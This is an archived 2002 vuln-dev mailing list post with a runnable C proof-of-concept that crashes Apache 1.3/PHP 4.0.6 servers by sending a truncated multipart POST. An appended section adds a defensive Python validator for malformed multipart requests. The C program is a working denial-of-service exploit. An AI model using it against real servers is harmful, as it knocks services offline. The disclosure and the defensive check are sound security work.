Apache+php Proof of Concept Exploit

From: Gabriel A. Maggiotti (gmaggiot@ciudad.com.ar)
Date: 03/03/02


Date: Sun, 03 Mar 2002 05:16:46 -0300
From: "Gabriel A. Maggiotti" <gmaggiot@ciudad.com.ar>
To: vuln-dev@securityfocus.com





/*
---------------------------------------------------------------------------
Web:    http://qb0x.net                 Author:  Gabriel A. Maggiotti
Date:   February 03, 2002               E-mail:  gmaggiot@ciudad.com.ar
---------------------------------------------------------------------------

Summary
-------
This is a proof of concept exploit for Apache/1.3.x + php_4.0.6. This
code exploits a multipart/form-data POST request bug. This code only crashes
the apache daemon; it does not open any shell or execute code on the remote
server. PHP supports multipart/form-data POST requests (as described in
RFC1867), known as POST file uploads. Unfortunately there are several flaws
in the php_mime_split function that could be used by an attacker to execute
arbitrary code. I don't know if the vuln I exploit is a known vuln or not.

Example:
--------

<quote>
[gabi@pluto logs]$ ./apache_php host 80 hi.php
[gabi@pluto logs]$ cat /www/logs/error_log

[Sun Mar 3 02:50:36 2002] [notice] child pid 26856 exit signal Segmentation fault (11)

[gabi@pluto logs]$
</quote>

Greets:
-------
Special greets to Fernando Oubiña and Sebastian Brocher, good friends of
mine.

Very special greets to a good friend and an excellent Security
Consultant, Alex Hernandez!!!

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

#define MAX 1000

/* Replace the first occurrence of orig in string with rep, in place.
 * string must point at a buffer of MAX bytes. Returns NULL when orig is
 * not present or the result would not fit, so the caller never writes
 * past the end of POST_REQUEST. */
char *str_replace(const char *rep, const char *orig, char *string)
{
        char buf[MAX];
        char *pt = strstr(string, orig);
        size_t prefix;

        if (pt == NULL)
                return NULL;
        prefix = (size_t)(pt - string);
        if (prefix + strlen(rep) + strlen(pt + strlen(orig)) >= MAX)
                return NULL;

        memcpy(buf, string, prefix);
        buf[prefix] = '\0';
        strcat(buf, rep);
        strcat(buf, pt + strlen(orig));
        strcpy(string, buf);
        return string;
}

int main(int argc, char *argv[])
{
        int sockfd;
        int port;
        char *ptr;

        /* The request declares Content-Length: 567 but the body stops after
         * the first part's Content-Disposition header, with no blank line,
         * no field data and no closing boundary. That truncated multipart
         * body is what the author reports crashing the child process. */
        char POST_REQUEST[MAX] =
                "POST ##file HTTP/1.0\n"
                "Referer: http://host/xxxxxx/exp.php?hi_lames=haha\n"
                "Connection: Keep-Alive\nContent-type: multipart/for"
                "m-data; boundary=---------------------------1354088"
                "10612827886801697150081\nContent-Length: 567\n\n---"
                "--------------------------1354088106128278868016971"
                "50081\nContent-Disposition: form-data; name=\"lang_id\"";

        struct hostent *he;
        struct sockaddr_in their_addr;

        if (argc != 4) {
                fprintf(stderr, "usage: %s <hostname> <port> <php_file>\n", argv[0]);
                exit(1);
        }

        port = atoi(argv[2]);
        /* Substitute the requested script path for the ##file placeholder. */
        if ((ptr = str_replace(argv[3], "##file", POST_REQUEST)) == NULL) {
                fprintf(stderr, "php_file path too long\n");
                exit(1);
        }

        /* gethostbyname() reports failures via h_errno, not errno, so
         * perror() would print an unrelated message here. */
        if ((he = gethostbyname(argv[1])) == NULL || he->h_addrtype != AF_INET) {
                fprintf(stderr, "gethostbyname: cannot resolve %s\n", argv[1]);
                exit(1);
        }

        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                perror("socket");
                exit(1);
        }

        memset(&their_addr, 0, sizeof(their_addr));
        their_addr.sin_family = AF_INET;
        their_addr.sin_port = htons(port);
        memcpy(&their_addr.sin_addr, he->h_addr_list[0], sizeof(struct in_addr));

        if (connect(sockfd, (struct sockaddr *)&their_addr,
                    sizeof(their_addr)) == -1) {
                perror("connect");
                exit(1);
        }

        /* ptr is POST_REQUEST after substitution; send the whole request. */
        if (send(sockfd, ptr, strlen(ptr), 0) == -1) {
                perror("send");
                exit(1);
        }

        close(sockfd);

        return 0;
}

/*
---------------------------------------------------------------------------
research-list@qb0x.net is dedicated to interactively researching
vulnerabilities and reporting potential or undeveloped holes in any kind of
computer system. To subscribe to research-list@qb0x.net send a blank email to
research-list-subscribe@qb0x.net. More help is available by sending an email
to research-list-help@qb0x.net.
Note: the list doesn't allow html, it will be stripped from messages.
---------------------------------------------------------------------------
*/
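The post describes the crash as the result of a multipart/form-data POST whose body does not have the structure RFC 1867 requires. As an added example that is not part of the original post or of the PoC, the following Python checks a raw request against its own framing: declared Content-Length versus bytes actually received, opening and closing boundary delimiters, and a blank line terminating each part's headers. The two sample requests, the boundary string and the field name are constructed for this example (the boundary is not the one used in the post); the code does not model php_mime_split itself, only the request shape a reverse proxy or upload handler could reject before passing it to the PHP parser.

```python
"""Structural check of a multipart/form-data POST (RFC 1867 upload).

Added example; not code from the original post. It validates the request
framing only, it does not reproduce PHP's php_mime_split."""
import re

# Header/body separator. Apache 1.3 accepted bare LF as well as CRLF,
# and the PoC request uses bare LF throughout.
SEP = re.compile(rb"\r?\n\r?\n")


def parse_request(raw):
    """Split a raw HTTP request into (request line, header dict, body bytes).

    Header names are lower-cased so 'Content-type' and 'Content-Type' match.
    Returns (None, {}, b"") when no header/body separator is present."""
    m = SEP.search(raw)
    if m is None:
        return None, {}, b""
    head = raw[:m.start()].decode("latin-1").split("\n")
    headers = {}
    for line in head[1:]:
        name, sep, value = line.rstrip("\r").partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return head[0].rstrip("\r"), headers, raw[m.end():]


def check_multipart(raw):
    """Return a list of findings; an empty list means the framing is well-formed.

    Requests that are not multipart/form-data are out of scope and also
    return an empty list."""
    request_line, headers, body = parse_request(raw)
    if request_line is None:
        return ["no header/body separator"]
    ctype = headers.get("content-type", "")
    if not ctype.lower().startswith("multipart/form-data"):
        return []
    bm = re.search(r"boundary=([^;]+)", ctype)
    if bm is None:
        return ["multipart/form-data without boundary parameter"]
    findings = []
    delim = b"--" + bm.group(1).strip().strip('"').encode("latin-1")

    # Declared length must not exceed what was actually delivered.
    declared = headers.get("content-length", "")
    if not declared.isdigit():
        findings.append("missing or non-numeric Content-Length")
    elif len(body) < int(declared):
        findings.append("truncated body: declared %s, received %d"
                        % (declared, len(body)))

    # A well-formed body opens with the delimiter and ends with delimiter + "--".
    if not body.startswith(delim):
        findings.append("body does not start with boundary delimiter")
    if not body.rstrip(b"\r\n").endswith(delim + b"--"):
        findings.append("missing closing boundary delimiter")

    # Each part is 'headers, blank line, data'. A part cut off inside its
    # headers (the shape the PoC sends) has no blank line at all.
    for i, part in enumerate(body.split(delim)[1:]):
        if part.startswith(b"--"):
            break                       # closing delimiter reached
        if SEP.search(part) is None:
            findings.append("part %d: headers not terminated by blank line" % i)
    return findings


# Constructed samples; the boundary is hypothetical, not the one in the post.
B = "----ConstructedBoundary7f3a"

# Same shape as the PoC request: Content-Length promises 567 bytes, the body
# stops after the first part's Content-Disposition header.
TRUNCATED = (
    "POST /hi.php HTTP/1.0\n"
    f"Content-type: multipart/form-data; boundary={B}\n"
    "Content-Length: 567\n\n"
    f"--{B}\n"
    'Content-Disposition: form-data; name="lang_id"'
).encode("latin-1")

# A complete single-field upload whose Content-Length matches its body.
_body = (
    f"--{B}\r\n"
    'Content-Disposition: form-data; name="lang_id"\r\n\r\n'
    "en\r\n"
    f"--{B}--\r\n"
)
WELL_FORMED = (
    "POST /hi.php HTTP/1.0\r\n"
    f"Content-Type: multipart/form-data; boundary={B}\r\n"
    f"Content-Length: {len(_body)}\r\n\r\n"
    + _body
).encode("latin-1")

if __name__ == "__main__":
    for name, req in (("well-formed", WELL_FORMED), ("truncated", TRUNCATED)):
        print(name, check_multipart(req) or "ok")
```

Run stand-alone it prints "ok" for the complete upload and three findings for the PoC-shaped request (truncated body, missing closing delimiter, a part whose headers never end). The length comparison is the cheapest of the three checks and already separates the two: a client that declares 567 bytes and closes the connection after a few dozen has not sent an upload at all.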


